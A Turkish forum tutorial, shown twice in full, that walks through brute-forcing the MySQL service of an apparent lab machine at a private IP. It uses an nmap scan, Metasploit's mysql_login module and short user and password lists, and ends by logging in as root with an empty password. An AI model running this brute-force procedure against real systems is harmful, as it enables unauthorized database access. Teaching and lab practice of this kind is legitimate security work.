Pentest derslerine yavaş yavaş başlıyoruz.
saldıracağımız ip adresimiz : 192.168.222.131
bu ip adresin mysql' una ulaşmaya çalışacağız.bunu yaparken kullanacağımız materyaller :
1-Nmap
2-Metasploit
3-User list
4-Pass list
Tahmin edebileceğiniz üzere Hedef sistemin mysql'una brute force saldırısı düzenleyeceğim.
Nmap Aracılığla Açıklı port versionlarını görüntülüyorum.
-sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.Bizim burada bakacağımız şey mysql portu 3306 dır.
Evet görüldüğü üzere Sistem Mysql Versiyonu olarak MySQL 5.0.51a-3ubuntu5 i kullanıyor.
Şimdi Metasploitimizi açalım ve uygun auxiliary'yi arayalım
Kod:
service postgresql start
Kod:
service mysql start
Kod:
msfconsole
Evet giriş yaptık.
şimdi komutumuz ise auxiliary aramak olucak.
Kod:
search mysql_login
yazalım.
Kod:
use auxiliary/scanner/mysql/mysql_login
ile auxiliary'ye giriş yapalım.Giriş Yaptık Ardından show options komutu ile bizden bazı seyleri doldurmamızı istediğini görüyoruz.
Bizde Dolduralım o zaman.
Kod:
set RHOSTS 192.168.222.131
diyoruz ve enterlıyoruz. Hedef sistemi girdik.Ardından ben bir userlist ve passlist oluşturuyorum
userlistimiz:
Kod:
msfadmin
msf
root
passlistimiz:
Kod:
(boşluk-hiçbirşey)
root
msfadmin
pass
password
Ve Ardından run diyoruz. brute force atağımız başlıyor.
Evet brute force atağımız başarılı .
Kullanıcı adı : root
şifre : yok (hiçbirşey)
Kontrol edelim.Terminali açalım ve şunu yazalım.
Kod:
mysql -h 192.168.222.131 -u root -p (hiçbirşey yazılmıycak çünkü yok)
Ardından tekrar password soruyor gene enterlıyoruz birşey yazmadan ve Hedef sistemin mysql'una giriş yaptık.
Konuyu anlatmamdaki amaç Mysql 3306 portunun metasploit ile nasıl hacklenebilineceği idi.
@Mectruy
saldıracağımız ip adresimiz : 192.168.222.131
bu ip adresin mysql' una ulaşmaya çalışacağız.bunu yaparken kullanacağımız materyaller :
1-Nmap
2-Metasploit
3-User list
4-Pass list
Tahmin edebileceğiniz üzere Hedef sistemin mysql'una brute force saldırısı düzenleyeceğim.
Nmap Aracılığla Açıklı port versionlarını görüntülüyorum.
-sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.Bizim burada bakacağımız şey mysql portu 3306 dır.
Evet görüldüğü üzere Sistem Mysql Versiyonu olarak MySQL 5.0.51a-3ubuntu5 i kullanıyor.
Şimdi Metasploitimizi açalım ve uygun auxiliary'yi arayalım
Kod:
service postgresql start
Kod:
service mysql start
Kod:
msfconsole
Evet giriş yaptık.
şimdi komutumuz ise auxiliary aramak olucak.
Kod:
search mysql_login
yazalım.
Kod:
use auxiliary/scanner/mysql/mysql_login
ile auxiliary'ye giriş yapalım.Giriş Yaptık Ardından show options komutu ile bizden bazı seyleri doldurmamızı istediğini görüyoruz.
Bizde Dolduralım o zaman.
Kod:
set RHOSTS 192.168.222.131
diyoruz ve enterlıyoruz. Hedef sistemi girdik.Ardından ben bir userlist ve passlist oluşturuyorum
userlistimiz:
Kod:
msfadmin
msf
root
passlistimiz:
Kod:
(boşluk-hiçbirşey)
root
msfadmin
pass
password
Ve Ardından run diyoruz. brute force atağımız başlıyor.
Evet brute force atağımız başarılı .
Kullanıcı adı : root
şifre : yok (hiçbirşey)
Kontrol edelim.Terminali açalım ve şunu yazalım.
Kod:
mysql -h 192.168.222.131 -u root -p (hiçbirşey yazılmıycak çünkü yok)
Ardından tekrar password soruyor gene enterlıyoruz birşey yazmadan ve Hedef sistemin mysql'una giriş yaptık.
Konuyu anlatmamdaki amaç Mysql 3306 portunun metasploit ile nasıl hacklenebilineceği idi.
@Mectruy
Son düzenleme:
